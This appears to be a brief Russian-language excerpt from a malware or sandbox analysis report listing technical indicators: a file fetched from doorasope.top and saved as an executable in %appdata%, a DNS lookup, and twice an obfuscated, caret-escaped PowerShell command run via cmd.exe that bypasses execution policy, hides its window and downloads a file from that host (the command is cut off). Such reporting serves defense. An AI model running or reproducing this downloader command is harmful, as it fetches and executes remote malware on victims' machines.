Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ERsHE^Ll.e^x^e^ ^-^ExecUT^iON^poliCY^ ^b^Y^paS^S^ ^-nopR^oFi^l^e -w^In^DO^WsTYl^E hID^D^en (New^-O^b^ject^ ^s^y^st^e^M^.nEt.^WEb^clI^E^n^t).do^w^NLOADfile(^'http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "POW^ERsHE^Ll.e^x^e^ ^-^ExecUT^iON^poliCY^ ^b^Y^paS^S^ ^-nopR^oFi^l^e -w^In^DO^WsTYl^E hID^D^en (New^-O^b^ject^ ^s^y^st^e^M^.nEt.^WEb^clI^E^n^t).do^w^NLOADfile(^'http://www.doo...' (со скрытым окном)